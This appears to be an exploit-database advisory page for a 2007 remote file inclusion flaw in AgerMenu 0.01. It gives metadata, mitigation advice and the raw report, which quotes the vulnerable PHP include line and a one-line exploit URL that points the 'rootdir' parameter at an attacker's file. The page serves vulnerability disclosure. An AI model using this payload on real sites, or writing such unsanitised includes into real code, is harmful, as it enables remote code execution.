header-logo
Suggest Exploit
vendor:
AgerMenu
by:
GolD_M (Mahmnood_ali)
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: AgerMenu
Affected Version From: AgerMenu version 0.01
Affected Version To: AgerMenu version 0.01
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote File Inclusion in AgerMenu

This exploit allows an attacker to include a remote file in the vulnerable PHP script 'top.inc.php' in AgerMenu version 0.01. The vulnerability can be exploited by appending a malicious file path to the 'rootdir' parameter in the URL. The attacker can then execute arbitrary code from the included file.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use proper input validation techniques. Additionally, keeping software up to date and applying patches can help prevent exploitation.
Source

Exploit-DB raw data:

===============================================================
Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_@W.Cn
===============================================================
URL Script: http://www.chbs.dk/proj/agermenu/agermenu-0.01.tgz
===============================================================
V.CODE: In : [path]/example/inc/top.inc.php
include $rootdir."inc/agermenu.func.php";
===============================================================
Exploit: v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?
===============================================================

# milw0rm.com [2007-02-07]

Navigation

Suggest Exploit

Services By CQR